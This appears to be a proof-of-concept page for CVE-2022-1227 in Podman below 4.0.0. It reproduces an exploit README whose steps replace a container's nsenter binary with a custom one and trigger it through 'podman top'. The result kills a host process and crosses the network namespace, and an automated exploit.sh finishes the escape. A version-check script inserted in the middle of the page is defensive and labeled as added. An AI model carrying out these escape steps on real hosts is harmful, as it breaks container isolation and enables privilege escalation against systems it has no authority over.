
CVE-2022-1227 PoC — Podman permission and access control vulnerability

Related vulnerability
Title: Podman permission and access control vulnerability (CVE-2022-1227)
Description: Podman is an engine for developing, managing and running OCI containers on Linux systems. Podman has a permission and access control vulnerability caused by improper privilege management at runtime; it allows a remote attacker to escalate privileges on the system.
Introduction
# CVE-2022-1227_Exploit

A script for exploiting CVE-2022-1227.

## Background

- Ubuntu `20.10` is recommended.
- Podman < `4.0.0` is required; `3.4.4` is recommended.

> TODO: add what is the principle of this vulnerability
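To decide whether a host needs attention, here is an added check script (not part of this repository) that classifies a `podman --version` string against the `4.0.0` bound stated above; the file name `check_podman.sh` and the assumption that `4.0.0` is the first unaffected release are mine.

```shell
#!/bin/sh
# Added example, not part of the CVE-2022-1227 PoC repository.
# Classifies a Podman version against the affected range stated in the README
# (Podman < 4.0.0). Assumption: 4.0.0 is the first release that is not affected.
FIXED="4.0.0"

# field VERSION N: numeric value of the N-th dot-separated component,
# with any non-numeric suffix (e.g. "0-rc1" -> "0") stripped.
field() {
    printf '%s\n' "$1" | cut -d. -f"$2" | sed 's/[^0-9].*//'
}

# version_lt A B: succeeds when A < B, comparing major.minor.patch numerically.
# Both sides are padded with ".0.0" so short versions such as "3" or "3.4"
# still yield three components.
version_lt() {
    i=1
    while [ "$i" -le 3 ]; do
        a=$(field "$1.0.0" "$i"); b=$(field "$2.0.0" "$i")
        a=${a:-0}; b=${b:-0}
        [ "$a" -lt "$b" ] && return 0
        [ "$a" -gt "$b" ] && return 1
        i=$((i + 1))
    done
    return 1   # equal
}

# is_affected STRING: extracts X.Y.Z from output such as "podman version 3.4.4"
# and prints a verdict. Exit 0 = affected, 1 = not affected, 2 = unparseable.
is_affected() {
    ver=$(printf '%s\n' "$1" | sed -n 's/.*\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\).*/\1/p')
    if [ -z "$ver" ]; then
        echo "could not parse a version from: $1" >&2
        return 2
    fi
    if version_lt "$ver" "$FIXED"; then
        echo "podman $ver: AFFECTED by CVE-2022-1227 (< $FIXED): upgrade; until then avoid 'podman top' on containers you do not fully control"
        return 0
    fi
    echo "podman $ver: not affected (>= $FIXED)"
    return 1
}

# Invoked as `sh check_podman.sh --check`, test the locally installed Podman.
if [ "${1:-}" = "--check" ] && command -v podman >/dev/null 2>&1; then
    is_affected "$(podman --version)"
fi
```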

## Install podman

Follow the instruction in the official document:
<https://podman.io/getting-started/installation#installing-on-linux>

For Ubuntu `20.10`, the install command should be:

```bash
sudo apt-get install podman=3.4.4+ds1-1ubuntu1
```

## Quick Start

### Simple Exploit

In this section we try a simple PoC that breaks the boundary of the `PID namespace` and `kill`s a process on the host.

Here are the steps:

1. Run a container with the following command: `podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity`
2. Run `keep` from `./exp/bin` and note the `PID` it reports; it prints its PID on the terminal. Because the binary is set to sleep for 600 seconds, you must complete the following steps within that time.

    ```plaintext
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    ```

3. Edit the source code in `./exp/src/sendsig.c` and fill in the PID obtained in the previous step in variable `pid`.

   ```c
   int pid = OLD_VAL;
   ```

   to

   ```c
   int pid = 7719;
   ```

4. Copy the compiled binary into the container: `podman cp ./exp/bin/sendsig $container_name:/usr/bin/nsenter`
5. Trigger the vulnerability with `podman top`: `podman top -l`
6. If everything goes right, the running `keep` process is killed immediately. This is unusual: normally a process inside the container cannot send a signal to a process on the host because of PID namespace isolation.

    ```plaintext
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed
    ```

## Full exploit

In this section, we use sockets to set up inter-process communication between a client in the container and a server on the host, which is normally impossible when the isolation mechanism is intact. We use this vulnerability to break through the network namespace isolation and carry out the exploit.

First, enter the directory with `cd ./exp`.

Then simply run `./exploit.sh`; everything is done automatically. If everything goes right, the server will display:

```plaintext
Hello from the container!
```

This means we crossed the network namespace and escaped.
File snapshot

```plaintext
[4.0K] /data/pocs/57f240dc830bbcd3a7f10a21868565e3f36900de
├── [4.0K] exp
│   ├── [4.0K] bin
│   │   ├── [ 16K] keep
│   │   ├── [ 16K] socket_client
│   │   └── [ 16K] socket_server
│   ├── [1.0K] exploit.sh
│   └── [4.0K] src
│       ├── [ 378] keep.c
│       ├── [ 490] sendsig.c
│       ├── [ 953] socket_client.c
│       └── [1.3K] socket_server.c
├── [ 11K] LICENSE
└── [2.4K] README.md

3 directories, 10 files
```